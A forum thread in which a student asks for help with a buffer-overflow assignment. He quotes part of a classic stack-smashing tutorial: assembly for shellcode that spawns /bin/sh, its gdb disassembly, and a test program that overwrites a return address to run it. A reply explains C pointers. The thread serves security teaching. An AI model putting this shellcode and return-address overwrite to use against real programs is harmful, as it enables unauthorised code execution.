Jump to content

- - - - -

Buffer Overflow Assignment

  • Please log in to reply
1 reply to this topic

#1 Ziggy54354


    OCC's Sexiest Asian

  • Members
  • PipPipPipPip
  • 1495 posts

Posted 13 March 2008 - 04:26 PM

My prof decided to give us a buffer overflow assignment for my comp security class... alot of how it works deals with assembly language and c (never learned c... seeing as our curriculum is primarily java based... go figure). We were givin this site http://insecure.org/...smashstack.html and on it is the following:

Looks good. To make sure it works correctly we must compile it and run it.
But there is a problem. Our code modifies itself, but most operating system
mark code pages read-only. To get around this restriction we must place the
code we wish to execute in the stack or data segment, and transfer control
to it. To do so we will place our code in a global array in the data
segment. We need first a hex representation of the binary code. Lets
compile it first, and then use gdb to obtain it.

void main() {
jmp 0x2a # 3 bytes
popl %esi # 1 byte
movl %esi,0x8(%esi) # 3 bytes
movb $0x0,0x7(%esi) # 4 bytes
movl $0x0,0xc(%esi) # 7 bytes
movl $0xb,%eax # 5 bytes
movl %esi,%ebx # 2 bytes
leal 0x8(%esi),%ecx # 3 bytes
leal 0xc(%esi),%edx # 3 bytes
int $0x80 # 2 bytes
movl $0x1, %eax # 5 bytes
movl $0x0, %ebx # 5 bytes
int $0x80 # 2 bytes
call -0x2f # 5 bytes
.string \"/bin/sh\" # 8 bytes

[aleph1]$ gcc -o shellcodeasm -g -ggdb shellcodeasm.c
[aleph1]$ gdb shellcodeasm
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(gdb) disassemble main
Dump of assembler code for function main:
0x8000130 <main>: pushl %ebp
0x8000131 <main+1>: movl %esp,%ebp
0x8000133 <main+3>: jmp 0x800015f <main+47>
0x8000135 <main+5>: popl %esi
0x8000136 <main+6>: movl %esi,0x8(%esi)
0x8000139 <main+9>: movb $0x0,0x7(%esi)
0x800013d <main+13>: movl $0x0,0xc(%esi)
0x8000144 <main+20>: movl $0xb,%eax
0x8000149 <main+25>: movl %esi,%ebx
0x800014b <main+27>: leal 0x8(%esi),%ecx
0x800014e <main+30>: leal 0xc(%esi),%edx
0x8000151 <main+33>: int $0x80
0x8000153 <main+35>: movl $0x1,%eax
0x8000158 <main+40>: movl $0x0,%ebx
0x800015d <main+45>: int $0x80
0x800015f <main+47>: call 0x8000135 <main+5>
0x8000164 <main+52>: das
0x8000165 <main+53>: boundl 0x6e(%ecx),%ebp
0x8000168 <main+56>: das
0x8000169 <main+57>: jae 0x80001d3 <__new_exitfn+55>
0x800016b <main+59>: addb %cl,0x55c35dec(%ecx)
End of assembler dump.
(gdb) x/bx main+3
0x8000133 <main+3>: 0xeb
0x8000134 <main+4>: 0x2a

char shellcode[] =

void main() {
int *ret;

ret = (int *)&ret + 2;
(*ret) = (int)shellcode;

[aleph1]$ gcc -o testsc testsc.c
[aleph1]$ ./testsc
$ exit

first question.. where the heck did the the hex stuff in char shellcode[] from from?
second question... what is the main doing? like i said im not familiar with the syntax in C so im not sure what putting a * next to a variable does or what the & sign does.

Edited by Ziggy54354, 13 March 2008 - 04:28 PM.

Current Rig:

Intel E8400 4ghz | DFI Blood-Iron P35 | EVGA 9800GTX+
2x 320GB Seagate 1x 500GB Seagate 1x 1.5TB Seagate | 4GB G.Skill pc8000 PQ

Ubuntu Rig:

AXP 1.4ghz 200FSB 7x | Abit NF-7s | 6800GS
200GB Seagate | 1gb Corsair XMS pc3200 2-2-2-11

#2 Waco


    Lab Rat 2

  • Members
  • PipPipPipPipPipPipPipPip
  • 16508 posts
  • Gender:Male
  • Location:Los Alamos, NM

Posted 13 March 2008 - 04:49 PM

I'm not familiar with the syntax in C so im not sure what putting a * next to a variable does or what the & sign does.

When declaring variables (like int * foo) the * makes that variable a pointer. If used inline with code, it dereferences the pointer.

& grabs the address of whatever it's used on (IE: &foo grabs the address of the variable foo).

Tolerance is a sign of weakness.